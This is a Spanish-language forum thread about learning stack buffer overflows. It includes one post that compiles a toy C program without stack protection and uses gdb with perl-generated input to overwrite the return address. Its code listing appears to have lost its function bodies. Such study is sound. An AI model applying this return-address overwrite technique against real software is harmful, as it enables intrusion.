 Autor
|
Tema: Duda sobre buffer overflow (Leído 12,407 veces)
|
buscador-tecnologico
 Desconectado
Mensajes: 13
|
ostias, y ese libro? parece interesante,no? el titulo del libro es: shellcoders sobre exploits? de que escritor?
100000 gracias y feliz navidad amigos!
|
|
|
|
|
En línea
|
|
|
|
|
Sagrini
|
|
|
|
|
« Última modificación: 1 Enero 2012, 20:52 pm por Sagrini »
|
En línea
|
|
|
|
|
pianista
|
Muchas gracias  Te lo agradezco Saludos |
|
|
|
|
En línea
|
|
|
|
AlbertoBSD
Programador y
Moderador Global
Desconectado
Mensajes: 3.696
🏴 Libertad!!!!!
|
Pianista muy buenos dias, y exito este año!
¿Que libro estas siguiendo?
La idea es la misma, sobreescribir la direccion de retorno con aquella que quieras que se ejecute, en este caso quieres que se ejecute 2 veces el printf dentro de la funcion return_input
Saludos.
|
|
|
|
|
En línea
|
|
|
|
|
Sagrini
|
#include <stdio.h> #include <string.h> #include <stdlib.h> int vuln (char *buff) { char buffer [36]; } int main (int argc, char *argv []) { vuln (argv [1]); } int feo () { }
sagrini@pc11-1:~/Escritorio$ nano code.c
sagrini@pc11-1:~/Escritorio$ gcc -o code code.c --no-stack-protector
sagrini@pc11-1:~/Escritorio$ gdb -q code
(gdb) r $(perl -e 'print "A"x36 . "BBBB"x3')
Program received signal SIGSEGV, Segmentation fault.
0x08048408 in __do_global_dtors_aux ()
(gdb)
(gdb) x/x feo
0x8048489 <feo>: 0x83e58955
(gdb) x/x feo
0x8048489 <feo>: 0x83e58955
(gdb) r $(perl -e 'print "\x90"x36 . "\x89\x84\x04\x08"x5')
Eres feo!!!
(gdb) quit
sagrini@pc11-1:~/Escritorio$
Ahora modifico para que funcione con una shellcode
|
|
|
|
« Última modificación: 1 Enero 2012, 23:06 pm por Sagrini »
|
En línea
|
|
|
|
|
adulti
|
¿Que libro estas siguiendo?
La idea es la misma, sobreescribir la direccion de retorno con aquella que quieras que se ejecute, en este caso quieres que se ejecute 2 veces el printf dentro de la funcion return_input
|
|
|
|
|
En línea
|
|
|
|
AlbertoBSD
Programador y
Moderador Global
Desconectado
Mensajes: 3.696
🏴 Libertad!!!!!
|
Funciono?
|
|
|
|
|
En línea
|
|
|
|
|
Sagrini
|
El que? Lo mio, perfectamente.
Os recomiendo el libro "Hacking, técnicas avanzadas", de Jon Erickson. Es buenisimo.
|
|
|
|
|
En línea
|
|
|
|
<<<-Basura->>>
Desconectado
Mensajes: 388
|
Mm.. se que el comentario no viene al caso, pero podrías pasar el link del libro para descargarlo y yo también leerlo  |
|
|
|
|
En línea
|
<<<--Basura-->>>
|
|
|
|
pianista
|
Disculpad, las fiestas navideñas es lo que tienen, ya estoy de nuevo por aquí jeje.
Ahora lo voy a probar que he estado liado desde entonces.
El libro es: The Shellcoders handbook
Lo compré en amazon aunque tiene bastantes años.
Luego por otro lado había uno muy majo que era el de The art of exploitation o algo así.
Saludos
|
|
|
|
|
En línea
|
|
|
|
|
| Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
buffer overflow
Ingeniería Inversa
|
Meg
|
2
|
5,808
|
6 Febrero 2009, 11:20 am
por Shaddy
|
|
|
|
Duda Buffer Overflow
Bugs y Exploits
|
R007h
|
2
|
3,656
|
17 Mayo 2010, 00:52 am
por dark_hat
|
|
|
|
una duda acerca del buffer overflow.
« 1 2 »
Bugs y Exploits
|
black_flowers
|
10
|
7,652
|
7 Abril 2011, 17:29 pm
por black_flowers
|
|
|
|
sobre la entrada GHOST: glibc: buffer overflow en gethostbyname CVE-2015-0235
Seguridad
|
1quark1
|
5
|
2,882
|
7 Febrero 2015, 20:53 pm
por .(sWeEtHaCk).
|
|
|
|
Duda explotando un buffer overflow en el stack
Bugs y Exploits
|
M3LiNdR1
|
3
|
2,965
|
9 Febrero 2024, 23:47 pm
por M3LiNdR1
|
 |
